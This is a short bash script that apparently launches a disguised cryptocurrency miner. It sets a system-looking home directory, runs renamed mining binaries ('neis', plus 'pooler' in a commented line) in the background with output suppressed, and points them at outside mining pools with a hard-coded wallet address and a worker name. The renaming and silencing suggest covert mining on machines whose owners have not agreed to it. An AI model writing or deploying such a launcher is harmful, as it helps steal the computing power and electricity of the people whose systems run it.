#!/bin/bash

HOME=/usr/share/cma

NAME=$(cat $HOME/name 2>/dev/null)
[ -z "$NAME" ] && NAME="rest"

PATH=$HOME:$PATH

update

#pooler --background --quiet --url stratum+tcp://ltc.give-me-coins.com:3333 --userpass zaos.$NAME:x  > /dev/null 2>&1
neis --background --quiet --algo quark --url http://fz2.mine-pool.net:9372 -u FJoZ2U7iu2kTXiJYrH6KDaeVWovefB2PqJ -p xxx  > /dev/null 2>&1

notify started
